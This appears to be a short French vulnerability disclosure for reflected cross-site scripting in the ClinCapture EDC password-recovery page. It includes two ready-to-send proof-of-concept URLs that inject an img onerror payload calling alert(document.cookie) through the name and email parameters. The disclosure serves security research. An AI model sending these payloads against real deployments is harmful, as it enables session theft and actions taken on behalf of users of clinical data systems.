
XSS réfléchi dans ClinCapture EDC
Ce dépôt est uniquement destiné à la recherche en sécurité éducative et défensive
Vulnérabilité de cross-site scripting réfléchi (XSS) dans ClinCapture EDC 3.0 et 2.2.3, permettant à un attaquant distant non authentifié d'exécuter du code JavaScript dans le contexte du navigateur de la victime.

Pour démontrer la vulnérabilité, vous devez vous rendre dans l'onglet de récupération de mot de passe et spécifier la charge utile dans le paramètre name ou email, ou envoyer une seule requête
<url>/edc/RequestPassword?action=submit&name=text%22%3E%3Cimg%20src%3dx%20onerror%3dalert(document.cookie)%3E&[email protected]&passwdChallengeQuestion=favorite_animal&passwdChallengeAnswer=&Submit=Submit

<url>/edc/RequestPassword?action=submit&name=text&[email protected]%22%3E%3Cimg%20src%3dx%20onerror%3dalert(document.cookie)%3E&passwdChallengeQuestion=favorite_animal&passwdChallengeAnswer=&Submit=Submit

Un utilisateur non authentifié peut exécuter du code JavaScript dans le contexte du navigateur de la victime, visant à effectuer des actions au nom de la victime ou à voler des informations confidentielles, comme la réponse à une question de sécurité